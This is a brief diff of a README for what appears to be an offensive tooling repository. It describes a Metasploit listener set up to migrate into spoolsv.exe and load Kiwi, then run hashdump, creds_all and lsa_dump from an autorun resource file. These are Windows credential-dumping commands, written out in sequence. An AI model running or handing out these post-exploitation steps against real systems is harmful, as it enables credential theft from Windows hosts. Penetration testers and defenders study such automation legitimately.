B34MR/rc4Gen/README.md

     The Multi/Handler listener is weaponized to automatically migrate into the
     spoolsv.exe process, load Kiwi, run sysinfo, hashdump, creds_all and lsa_dump.

-    migrate -N spoolsv.exe
+    A file called 'autorun_commands.rc' is created with the following commands: migrate -N spoolsv.exe
     load kiwi
     sysinfo